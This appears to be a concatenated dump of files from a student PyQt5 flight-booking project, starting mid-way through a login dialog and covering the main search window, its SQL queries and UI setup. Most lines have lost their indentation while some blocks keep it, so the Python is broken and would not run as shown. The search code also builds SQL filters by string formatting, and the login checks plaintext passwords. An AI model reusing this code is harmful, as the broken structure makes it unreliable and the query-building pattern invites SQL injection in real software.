print(QMessageBox.information(self, "提示", "该账号不存在!", QMessageBox.Yes))
else:
if (user_name == query.value(0) and password == query.value(1)):
                if (query.value(2) == 1):
                    # admin account: jump to the admin window afterwards
                    print(QMessageBox.information(self, "提示", "登录成功!", QMessageBox.Yes))
                    self.power = 2
                    self.username = user_name
                else:
                    # ordinary user: jump to the user window afterwards
                    print(QMessageBox.information(self, "提示", "登录成功!", QMessageBox.Yes))
                    self.power = 1
                    self.username = user_name
else:
print(QMessageBox.information(self, "提示", "密码错误!", QMessageBox.Yes))
return
def window_close(self):
self.close()
# TODO: add the follow-up windows
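# This Ui class is consumed by mixing it into a QDialog subclass (see Login_Window
# in search.py), which is what makes self.close() and the QMessageBox parents resolve:
#     class Login_Window(QDialog, Ui_Dialog):
#         def __init__(self, parent=None):
#             super(Login_Window, self).__init__(parent)
#             self.setupUi(self)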
```
#### File: 519401113/course-design/search.py
```python
from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QHeaderView
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtSql import *
import sys
import register
import login
import register_win
import register_fail
import jump_buy
import add_flight
class Register_Window(QDialog, register.Ui_Dialog):
def __init__(self, parent = None):
super(Register_Window, self).__init__(parent)
self.setupUi(self)
class Login_Window(QDialog, login.Ui_Dialog):
def __init__(self, parent = None):
super(Login_Window, self).__init__(parent)
self.setupUi(self)
class Jump_Buy_Window(QDialog, jump_buy.Ui_Dialog_jump_buy):
def __init__(self, parent=None):
super(Jump_Buy_Window, self).__init__(parent)
self.setupUi(self)
class Add_Flight_Window(QDialog, add_flight.Ui_Dialog):
def __init__(self,parent = None):
super(Add_Flight_Window, self).__init__(parent)
self.setupUi(self)
class Ui_MainWindow(object):
    state = -1     # selected leg: 0 = departure-destination, 1 = departure-transit, 2 = transit-destination, -1 = none
    username = ''
    num = -1       # flight-plan number of the selected row
    index = -1
    power = 0      # permission: 0 = not logged in, 1 = user, 2 = admin
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1600, 900)
MainWindow.setMinimumSize(QtCore.QSize(567, 384))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("flight.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_departure = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_departure.sizePolicy().hasHeightForWidth())
self.label_departure.setSizePolicy(sizePolicy)
self.label_departure.setAlignment(QtCore.Qt.AlignCenter)
self.label_departure.setObjectName("label_departure")
self.horizontalLayout_2.addWidget(self.label_departure)
self.comboBox_departure = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_departure.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_departure.sizePolicy().hasHeightForWidth())
self.comboBox_departure.setSizePolicy(sizePolicy)
self.comboBox_departure.setEditable(False)
self.comboBox_departure.setObjectName("comboBox_departure")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_departure)
self.label_destination = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_destination.sizePolicy().hasHeightForWidth())
self.label_destination.setSizePolicy(sizePolicy)
self.label_destination.setAlignment(QtCore.Qt.AlignCenter)
self.label_destination.setObjectName("label_destination")
self.horizontalLayout_2.addWidget(self.label_destination)
self.comboBox_destination = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_destination.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_destination.sizePolicy().hasHeightForWidth())
self.comboBox_destination.setSizePolicy(sizePolicy)
self.comboBox_destination.setEditable(False)
self.comboBox_destination.setObjectName("comboBox_destination")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_destination)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_date = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_date.sizePolicy().hasHeightForWidth())
self.label_date.setSizePolicy(sizePolicy)
self.label_date.setAlignment(QtCore.Qt.AlignCenter)
self.label_date.setObjectName("label_date")
self.horizontalLayout_4.addWidget(self.label_date)
self.dateEdit = QtWidgets.QDateEdit(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dateEdit.sizePolicy().hasHeightForWidth())
self.dateEdit.setSizePolicy(sizePolicy)
self.dateEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setMaximumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 12, 31), QtCore.QTime(23, 59, 59)))
self.dateEdit.setMinimumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setObjectName("dateEdit")
self.horizontalLayout_4.addWidget(self.dateEdit)
self.verticalLayout.addLayout(self.horizontalLayout_4)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_class = QtWidgets.QLabel(self.centralwidget)
self.label_class.setAlignment(QtCore.Qt.AlignCenter)
self.label_class.setObjectName("label_class")
self.horizontalLayout_5.addWidget(self.label_class)
self.comboBox_class = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_class.setObjectName("comboBox_class")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.horizontalLayout_5.addWidget(self.comboBox_class)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.Search = QtWidgets.QPushButton(self.centralwidget)
self.Search.setObjectName("Search")
self.verticalLayout.addWidget(self.Search)
self.pushbutton_buy = QtWidgets.QPushButton(self.centralwidget)
self.pushbutton_buy.setObjectName("pushbutton_buy")
self.verticalLayout.addWidget(self.pushbutton_buy)
self.horizontalLayout.addLayout(self.verticalLayout)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_departure_arrival = QtWidgets.QLabel(self.centralwidget)
self.label_departure_arrival.setObjectName("label_departure_arrival")
self.verticalLayout_2.addWidget(self.label_departure_arrival)
self.tableView_departure_arrival = QtWidgets.QTableView(self.centralwidget)
self.tableView_departure_arrival.setObjectName("tableView_departure_arrival")
self.verticalLayout_2.addWidget(self.tableView_departure_arrival)
self.label_departure_transit = QtWidgets.QLabel(self.centralwidget)
self.label_departure_transit.setObjectName("label_departure_transit")
self.verticalLayout_2.addWidget(self.label_departure_transit)
self.tableView_departure_transit = QtWidgets.QTableView(self.centralwidget)
self.tableView_departure_transit.setObjectName("tableView_departure_transit")
self.verticalLayout_2.addWidget(self.tableView_departure_transit)
self.label_transit_arrival = QtWidgets.QLabel(self.centralwidget)
self.label_transit_arrival.setObjectName("label_transit_arrival")
self.verticalLayout_2.addWidget(self.label_transit_arrival)
self.tableView_transit_destination = QtWidgets.QTableView(self.centralwidget)
self.tableView_transit_destination.setObjectName("tableview_transit_destination")
self.verticalLayout_2.addWidget(self.tableView_transit_destination)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1600, 21))
self.menubar.setObjectName("menubar")
self.menu_register_login = QtWidgets.QMenu(self.menubar)
self.menu_register_login.setObjectName("menu_register_login")
self.menu_function = QtWidgets.QMenu(self.menubar)
self.menu_function.setObjectName("menu_function")
self.menu_user = QtWidgets.QMenu(self.menu_function)
self.menu_user.setObjectName("menu_user")
self.menu_administrator = QtWidgets.QMenu(self.menu_function)
self.menu_administrator.setObjectName("menu_administrator")
MainWindow.setMenuBar(self.menubar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.toolBar_2 = QtWidgets.QToolBar(MainWindow)
self.toolBar_2.setObjectName("toolBar_2")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_2)
self.toolBar_3 = QtWidgets.QToolBar(MainWindow)
self.toolBar_3.setObjectName("toolBar_3")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_3)
self.statusBar = QtWidgets.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actionregister = QtWidgets.QAction(MainWindow)
self.actionregister.setObjectName("actionregister")
self.actionbuy = QtWidgets.QAction(MainWindow)
self.actionbuy.setObjectName("actionbuy")
self.action_buy = QtWidgets.QAction(MainWindow)
self.action_buy.setObjectName("action_buy")
self.actiond_my_ticket = QtWidgets.QAction(MainWindow)
self.actiond_my_ticket.setObjectName("actiond_my_ticket")
self.action_add_flight = QtWidgets.QAction(MainWindow)
self.action_add_flight.setObjectName("action_add_flight")
self.actionlogin = QtWidgets.QAction(MainWindow)
self.actionlogin.setObjectName("actionlogin")
self.menu_register_login.addAction(self.actionregister)
self.menu_register_login.addAction(self.actionlogin)
self.menu_user.addAction(self.action_buy)
self.menu_user.addAction(self.actiond_my_ticket)
self.menu_administrator.addAction(self.action_add_flight)
self.menu_function.addAction(self.menu_user.menuAction())
self.menu_function.addAction(self.menu_administrator.menuAction())
self.menubar.addAction(self.menu_register_login.menuAction())
self.menubar.addAction(self.menu_function.menuAction())
self.retranslateUi(MainWindow)
self.Search.clicked.connect(self.searchresult)
#self.login.clicked.connect(self.open_login)
self.pushbutton_buy.clicked.connect(self.jump_buy)
self.actionregister.triggered.connect(self.open_register)
self.actionlogin.triggered.connect(self.open_login)
# self.register_2.clicked.connect(self.open_register)
self.action_add_flight.triggered.connect(self.open_add_flight)
self.tableView_departure_arrival.clicked.connect(self.da)
self.tableView_departure_transit.clicked.connect(self.dt)
self.tableView_transit_destination.clicked.connect(self.ta)
self.tableView_departure_arrival.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tableView_transit_destination.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tableView_departure_transit.setSelectionBehavior(QAbstractItemView.SelectRows)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
# # def function_login(self):
# child_login, child_login_ui = login.Ui_Dialog.instantiation(login)
# child_login_ui.button_connect(child_login, self.login)
#
# # def function_register(self):
# child_register, child_register_ui = register.Ui_Dialog.instantiation(register)
# child_register_ui.button_connect(child_register, self.register_2)
def searchresult(self):
self.state = -1
query_flight_dt = QSqlQuery()
query_flight_dt.prepare('SELECT 航班编号 FROM 航班 '
'WHERE 航班.出发机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
'and 航班.经停机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)')
query_flight_dt.bindValue(":departure", self.comboBox_departure.currentText())
query_flight_dt.bindValue(":destination", self.comboBox_destination.currentText()) # 绑定占位符和相应的功能
query_flight_dt.exec_()
flight_dt = '('
while query_flight_dt.next():
flight_dt += "'" + query_flight_dt.value(0) + "'"
if query_flight_dt.next():
flight_dt += ","
query_flight_dt.previous()
flight_dt += ")" # flight : (A, B, ....)
self.model1 = QSqlTableModel()
self.tableView_departure_transit.setModel(self.model1)
self.model1.setTable('飞行计划安排')
self.model1.setFilter("航班编号 in %s and DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0 and [%s(开始-经停)剩余座位] > 0 "
% (flight_dt, self.dateEdit.date().toString("yyyy-MM-dd"), self.comboBox_class.currentText()))
self.model1.select()
        # hide the columns that are irrelevant to the departure-transit leg
        for col in (4, 5, 6, 7, 8, 9, 10, 11, 15, 17, 18, 20, 21, 23):
            self.tableView_departure_transit.hideColumn(col)
        # hide the seat/price columns of the two cabin classes that were not selected
        if self.comboBox_class.currentText() == "头等舱":
            hidden = (16, 19, 12, 13)
        elif self.comboBox_class.currentText() == "经济舱":
            hidden = (19, 22, 13, 14)
        else:
            hidden = (16, 22, 12, 14)
        for col in hidden:
            self.tableView_departure_transit.hideColumn(col)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(0,QHeaderView.Interactive)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)
self.tableView_departure_transit.horizontalHeader().setSectionResizeMode(3, QHeaderView.Interactive)
self.tableView_departure_transit.setColumnWidth(0,90)
self.tableView_departure_transit.setColumnWidth(1,90)
self.tableView_departure_transit.setColumnWidth(2,200)
self.tableView_departure_transit.setColumnWidth(3,210)
self.tableView_departure_transit.show()
        query_flight = QSqlQuery()  # create the query object
        query_flight.prepare('SELECT 航班编号 FROM 航班 '
                             'WHERE 航班.出发机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
                             'and 航班.到达机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)')  # prepare the SQL statement
        query_flight.bindValue(":departure", self.comboBox_departure.currentText())
        query_flight.bindValue(":destination", self.comboBox_destination.currentText())  # bind the named placeholders
        query_flight.exec_()  # execute
        flight = "("
        while query_flight.next():
            flight += "'" + query_flight.value(0) + "'"
            if query_flight.next():
                flight += ","
            query_flight.previous()
        if flight == "(":
            flight += "''"  # avoid an empty "IN ()" clause, which is invalid SQL
        flight += ")"  # flight: ('A','B',...)
        self.model = QSqlTableModel()  # create the table model
        self.tableView_departure_arrival.setModel(self.model)  # bind it to the table view
        self.model.setTable('飞行计划安排')  # the FROM clause
        self.model.setFilter("航班编号 in %s and DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0 and [%s(开始-到达)剩余座位] > 0 "
                             % (flight, self.dateEdit.date().toString("yyyy-MM-dd"), self.comboBox_class.currentText()))  # the WHERE clause
        # self.model.setFilter("DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0" % (self.dateEdit.date().toString("yyyy-MM-dd") ))
        # print(self.model.filter())
        self.model.select()  # run the SELECT
        # hide the columns that are irrelevant to the departure-arrival leg
        for col in (3, 4, 9, 10, 11, 12, 13, 14, 16, 17, 19, 20, 22, 23):
            self.tableView_departure_arrival.hideColumn(col)
        # hide the seat/price columns of the two cabin classes that were not selected
        if self.comboBox_class.currentText() == "头等舱":
            hidden = (15, 18, 6, 7)
        elif self.comboBox_class.currentText() == "经济舱":
            hidden = (21, 18, 7, 8)
        else:
            hidden = (15, 21, 6, 8)
        for col in hidden:
            self.tableView_departure_arrival.hideColumn(col)
# self.tableView_departure_arrival.setColumnWidth(3,200)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(0,QHeaderView.Interactive)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)
self.tableView_departure_arrival.horizontalHeader().setSectionResizeMode(5, QHeaderView.Interactive)
self.tableView_departure_arrival.setColumnWidth(0,90)
self.tableView_departure_arrival.setColumnWidth(1,90)
self.tableView_departure_arrival.setColumnWidth(2,200)
self.tableView_departure_arrival.setColumnWidth(5,190)
self.tableView_departure_arrival.show() # 显示
query_flight_ta = QSqlQuery()
query_flight_ta.prepare('SELECT 航班编号 FROM 航班 '
'WHERE 航班.经停机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
'and 航班.到达机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)')
query_flight_ta.bindValue(":departure", self.comboBox_departure.currentText())
query_flight_ta.bindValue(":destination", self.comboBox_destination.currentText()) # 绑定占位符和相应的功能
query_flight_ta.exec_()
flight_ta = '('
while query_flight_ta.next():
flight_ta += "'" + query_flight_ta.value(0) + "'"
if query_flight_ta.next():
flight_ta += ","
query_flight_ta.previous()
flight_ta += ")" # flight : (A, B, ....)
print (flight_ta)
self.model2 = QSqlTableModel()
self.tableView_transit_destination.setModel(self.model2)
self.model2.setTable('飞行计划安排')
self.model2.setFilter("航班编号 in %s and DATEDIFF(DAYOFYEAR, '%s', 计划出发时间) = 0 and [%s(经停-到达)剩余座位] > 0 "
% (flight_ta, self.dateEdit.date().toString("yyyy-MM-dd"),
self.comboBox_class.currentText()))
print(self.model2.filter())
self.model2.select()
        # hide the columns that are irrelevant to the transit-arrival leg
        for col in (2, 3, 6, 7, 8, 12, 13, 14, 15, 16, 18, 19, 21, 22):
            self.tableView_transit_destination.hideColumn(col)
        # hide the seat/price columns of the two cabin classes that were not selected
        if self.comboBox_class.currentText() == "头等舱":
            hidden = (17, 20, 9, 10)
        elif self.comboBox_class.currentText() == "经济舱":
            hidden = (20, 23, 10, 11)
        else:
            hidden = (17, 23, 9, 11)
        for col in hidden:
            self.tableView_transit_destination.hideColumn(col)
#
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(4, QHeaderView.Interactive)
self.tableView_transit_destination.horizontalHeader().setSectionResizeMode(5, QHeaderView.Interactive)
self.tableView_transit_destination.setColumnWidth(0, 90)
self.tableView_transit_destination.setColumnWidth(1, 90)
self.tableView_transit_destination.setColumnWidth(4, 230)
self.tableView_transit_destination.setColumnWidth(5, 190)
self.tableView_transit_destination.show()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_departure.setText(_translate("MainWindow", "Departure"))
self.comboBox_departure.setCurrentText(_translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_departure.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_departure.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_departure.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_departure.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_departure.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_departure.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_departure.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_departure.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_departure.setItemText(10, _translate("MainWindow", "南昌"))
self.label_destination.setText(_translate("MainWindow", "Destination"))
self.comboBox_destination.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_destination.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_destination.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_destination.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_destination.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_destination.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_destination.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_destination.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_destination.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_destination.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_destination.setItemText(10, _translate("MainWindow", "南昌"))
self.label_date.setText(_translate("MainWindow", "DATE"))
self.label_class.setText(_translate("MainWindow", "Class"))
self.comboBox_class.setItemText(0, _translate("MainWindow", "头等舱"))
self.comboBox_class.setItemText(1, _translate("MainWindow", "商务舱"))
self.comboBox_class.setItemText(2, _translate("MainWindow", "经济舱"))
self.Search.setText(_translate("MainWindow", "Search"))
self.pushbutton_buy.setText(_translate("MainWindow", "Buy"))
self.label_departure_arrival.setText(_translate("MainWindow", "出发 - 到达:"))
self.label_departure_transit.setText(_translate("MainWindow", "出发 - 经停:"))
self.label_transit_arrival.setText(_translate("MainWindow", "经停 - 到达:"))
self.menu_register_login.setTitle(_translate("MainWindow", "注册"))
self.menu_function.setTitle(_translate("MainWindow", "功能"))
self.menu_user.setTitle(_translate("MainWindow", "用户"))
self.menu_administrator.setTitle(_translate("MainWindow", "管理员"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.toolBar_2.setWindowTitle(_translate("MainWindow", "toolBar_2"))
self.toolBar_3.setWindowTitle(_translate("MainWindow", "toolBar_3"))
self.actionregister.setText(_translate("MainWindow", "用户注册"))
self.actionbuy.setText(_translate("MainWindow", "机票购买"))
self.action_buy.setText(_translate("MainWindow", "机票购买"))
self.actiond_my_ticket.setText(_translate("MainWindow", "我的机票"))
self.action_add_flight.setText(_translate("MainWindow", "添加航程"))
self.actionlogin.setText(_translate("MainWindow", "用户/管理员登录"))
def open_login(self):
login_window = Login_Window()
login_window.exec_()
self.username = login_window.username
self.power = login_window.power
def open_register(self):
register_window = Register_Window()
register_window.exec_()
def open_add_flight(self):
        add_flight_window = Add_Flight_Window()
add_flight_window.exec_()
def jump_buy(self):
if (self.power < 1):
reply = QMessageBox.warning(self,
"消息框标题",
"请先登录后再购票!",
QMessageBox.Yes | QMessageBox.No)
elif (self.state == -1):
reply = QMessageBox.warning(self,
"消息框标题",
"请选取要买的票!",
QMessageBox.Yes | QMessageBox.No)
else:
jump_buy_window = Jump_Buy_Window()
jump_buy_window.state = self.state
jump_buy_window.num = self.num
jump_buy_window.username = self.username
jump_buy_window.exec_()
self.state = -1
    def da(self):
        # a row in the departure-arrival table was clicked
        self.state = 0
        self.index = self.tableView_departure_arrival.currentIndex().row()
        model = self.tableView_departure_arrival.model()
        self.num = model.data(model.index(self.index, 0))  # column 0 holds the flight-plan number
    def dt(self):
        # a row in the departure-transit table was clicked
        self.state = 1
        self.index = self.tableView_departure_transit.currentIndex().row()
        model = self.tableView_departure_transit.model()
        self.num = model.data(model.index(self.index, 0))
    def ta(self):
        # a row in the transit-destination table was clicked
        self.state = 2
        self.index = self.tableView_transit_destination.currentIndex().row()
        model = self.tableView_transit_destination.model()
        self.num = model.data(model.index(self.index, 0))
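    # The three handlers above feed jump_buy(): `state` records which leg table was
    # clicked and `num` the flight-plan number; Jump_Buy_Window (defined in
    # jump_buy.py, not shown in this snapshot) receives state, num and username to
    # complete the purchase.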
```
#### File: course-design/ui/search.py
```python
from PyQt5 import QtWidgets,QtGui,QtCore
from PyQt5.QtCore import *
from PyQt5.QtSql import *
import sys
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(567, 334)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_departure = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_departure.sizePolicy().hasHeightForWidth())
self.label_departure.setSizePolicy(sizePolicy)
self.label_departure.setAlignment(QtCore.Qt.AlignCenter)
self.label_departure.setObjectName("label_departure")
self.horizontalLayout_2.addWidget(self.label_departure)
self.comboBox_departure = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_departure.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_departure.sizePolicy().hasHeightForWidth())
self.comboBox_departure.setSizePolicy(sizePolicy)
self.comboBox_departure.setEditable(False)
self.comboBox_departure.setObjectName("comboBox_departure")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.comboBox_departure.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_departure)
self.label_destination = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_destination.sizePolicy().hasHeightForWidth())
self.label_destination.setSizePolicy(sizePolicy)
self.label_destination.setAlignment(QtCore.Qt.AlignCenter)
self.label_destination.setObjectName("label_destination")
self.horizontalLayout_2.addWidget(self.label_destination)
self.comboBox_destination = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_destination.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.comboBox_destination.sizePolicy().hasHeightForWidth())
self.comboBox_destination.setSizePolicy(sizePolicy)
self.comboBox_destination.setEditable(False)
self.comboBox_destination.setObjectName("comboBox_destination")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.comboBox_destination.addItem("")
self.horizontalLayout_2.addWidget(self.comboBox_destination)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_date = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_date.sizePolicy().hasHeightForWidth())
self.label_date.setSizePolicy(sizePolicy)
self.label_date.setAlignment(QtCore.Qt.AlignCenter)
self.label_date.setObjectName("label_date")
self.horizontalLayout_4.addWidget(self.label_date)
self.dateEdit = QtWidgets.QDateEdit(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dateEdit.sizePolicy().hasHeightForWidth())
